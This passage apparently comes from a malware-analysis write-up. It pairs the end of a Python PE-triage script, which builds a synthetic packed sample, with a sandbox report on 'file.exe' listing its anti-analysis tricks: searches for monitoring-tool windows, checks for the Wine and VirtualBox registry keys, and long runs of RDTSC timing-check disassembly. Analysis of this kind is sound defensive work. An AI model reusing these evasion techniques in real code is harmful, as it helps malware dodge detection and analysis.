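    struct.pack_into("<H", opt, 0, 0x10B)      # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 64, stored_checksum)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    hdr_len = 64 + 4 + len(file_hdr) + len(opt) + 40 * len(sections)
    raw_base = -(-hdr_len // 512) * 512        # raw data begins at the next 512-byte boundary
    table, raw = b"", b""
    for name, va, content in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(content), va, len(content),
                             raw_base + len(raw), 0, 0, 0, 0, 0x60000020)
        raw += content
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)      # e_lfanew
    return (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table).ljust(raw_base, b"\0") + raw


# Constructed sample mirroring the report: code in .text, a packed blob in "zdqimryq"
# (bytes(range(256)) * 4 is a deterministic stand-in with entropy exactly 8.0), the entry
# point inside ".taggant", and the report's stored checksum 0x1c43c2, which cannot match.
SAMPLE_SECTIONS = [
    (".text", 0x1000, b"\x55\x8b\xec\x83\xec\x10" * 64),
    ("zdqimryq", 0x2000, bytes(range(256)) * 4),
    (".taggant", 0x3000, b"\xe8\x00\x00\x00\x00\x5d" * 32),
]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS, entry_rva=0x3000, stored_checksum=0x1C43C2)

if __name__ == "__main__":
    for finding in triage(SAMPLE_PE):
        print(finding)
```

fix_checksum shows the round trip: the CheckSum field is skipped during summation, so recomputing over the file and patching the field yields a consistent image, and a packer that rewrites sections without redoing that step leaves exactly the mismatch the report flags. On a real file, pass the bytes of open(path, "rb").read() to triage and expect hits on legitimately packed, protected or .NET binaries as well; these are triage signals, not verdicts.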

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_4-13249)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2E204A | second address: 2E204E | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45A68E | second address: 45A694 | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4598F2 | second address: 45990F | instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA49D1B33C8h 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007FA49D1B33C6h 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45990F | second address: 459917 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 459917 | second address: 45991C | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 459E78 | second address: 459E7C | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 459E7C | second address: 459E97 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA49D1B33CDh 0x0000000d je 00007FA49D1B33C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 459E97 | second address: 459E9F | instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C208 | second address: 45C20C | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C271 | second address: 45C276 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C276 | second address: 45C31B | instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnc 00007FA49D1B33D0h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FA49D1B33C8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov esi, dword ptr [ebp+122D2965h] 0x00000032 call 00007FA49D1B33C9h 0x00000037 jp 00007FA49D1B33D8h 0x0000003d push eax 0x0000003e jnc 00007FA49D1B33D4h 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 jng 00007FA49D1B33D6h 0x0000004e jmp 00007FA49D1B33D0h 0x00000053 mov eax, dword ptr [eax] 0x00000055 push eax 0x00000056 push edx 0x00000057 jc 00007FA49D1B33CCh 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C31B | second address: 45C31F | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C31F | second address: 45C336 | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA49D1B33C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C336 | second address: 45C37C | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D2F90h], ecx 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 xor dl, 00000071h 0x00000015 call 00007FA49CDAB57Fh 0x0000001a mov edi, dword ptr [ebp+122D2A3Dh] 0x00000020 pop edi 0x00000021 push 00000003h 0x00000023 mov ecx, dword ptr [ebp+122D2A59h] 0x00000029 push 827B3598h 0x0000002e push eax 0x0000002f push edx 0x00000030 jo 00007FA49CDAB57Ch 0x00000036 jl 00007FA49CDAB576h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 45C37C | second address: 45C3C3 | instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FA49D1B33C6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3D84CA68h 0x00000013 call 00007FA49D1B33CAh 0x00000018 movsx edi, di 0x0000001b pop ecx 0x0000001c lea ebx, dword ptr [ebp+1244E009h] 0x00000022 or dword ptr [ebp+122D18CFh], esi 0x00000028 xchg eax, ebx 0x00000029 jmp 00007FA49D1B33CCh 0x0000002e push eax 0x0000002f pushad 0x00000030 jne 00007FA49D1B33C8h 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44DEF9 second address: 44DF09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF26 second address: 47AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF2A second address: 47AF46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF46 second address: 47AF54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FA49D1B33C6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47AF54 second address: 47AF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B3A2 second address: 47B3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA49D1B33C6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B3AD second address: 47B3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB57Eh 0x00000009 jnc 00007FA49CDAB576h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BE5D second address: 47BE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA49D1B33C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FA49D1B33D9h 0x00000011 popad 0x00000012 js 00007FA49D1B33CEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BE8D second address: 47BE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47BE94 second address: 47BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA49D1B33CBh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C02E second address: 47C034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C2FF second address: 47C326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA49D1B33CEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C326 second address: 47C33D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA49CDAB580h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C33D second address: 47C36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FA49D1B33D9h 0x00000011 js 00007FA49D1B33C6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C36A second address: 47C379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FA49CDAB576h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C379 second address: 47C37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C37D second address: 47C381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C381 second address: 47C387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C387 second address: 47C396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB57Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E9CE second address: 47EA0F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA49D1B33C6h 0x00000008 jmp 00007FA49D1B33D5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FA49D1B33D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jng 00007FA49D1B33C6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA0F second address: 47EA26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA49CDAB57Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA26 second address: 47EA4C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA49D1B33C6h 0x00000008 jmp 00007FA49D1B33D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FA49D1B33D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA4C second address: 47EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA49CDAB576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483E25 second address: 483E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483E29 second address: 483E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48427C second address: 484290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484677 second address: 48467D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48467D second address: 484682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4886C5 second address: 4886C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4886C9 second address: 4886D9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA49D1B33C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4886D9 second address: 4886DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487AFB second address: 487B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA49D1B33CBh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E20 second address: 487E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E3F second address: 487E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E45 second address: 487E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488513 second address: 488529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA49D1B33CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488529 second address: 48852D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48852D second address: 48854C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA49D1B33C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA49D1B33D1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACB6 second address: 48ACBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACBC second address: 48ACDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACDA second address: 48ACE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48ACE0 second address: 48ACEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49D1B33CAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B386 second address: 48B38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B38A second address: 48B3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA49D1B33C8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA49D1B33CCh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B422 second address: 48B42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA49CDAB576h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B807 second address: 48B80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B80D second address: 48B818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA49CDAB576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B818 second address: 48B874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FA49D1B33D5h 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FA49D1B33C8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 ja 00007FA49D1B33CCh 0x0000002e jmp 00007FA49D1B33CEh 0x00000033 nop 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B874 second address: 48B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B878 second address: 48B884 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B954 second address: 48B969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB581h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BD40 second address: 48BD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BDDA second address: 48BE2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007FA49CDAB57Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FA49CDAB578h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b xchg eax, ebx 0x0000002c je 00007FA49CDAB58Fh 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BE2F second address: 48BE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C38D second address: 48C391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C391 second address: 48C39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA49D1B33C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CD3C second address: 48CD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CD40 second address: 48CD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CD4C second address: 48CD5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E9BF second address: 48EA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FA49D1B33C8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov di, si 0x00000026 mov si, cx 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D1D4Bh], esi 0x00000031 push 00000000h 0x00000033 xor dword ptr [ebp+12476F62h], ecx 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FA49D1B33D4h 0x0000003f push eax 0x00000040 jp 00007FA49D1B33E2h 0x00000046 pushad 0x00000047 jmp 00007FA49D1B33D4h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491514 second address: 491528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB580h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491528 second address: 491597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FA49D1B33C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, 1293CD05h 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D1AD4h] 0x00000033 xchg eax, ebx 0x00000034 jnl 00007FA49D1B33DBh 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA49D1B33CFh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 493273 second address: 493279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
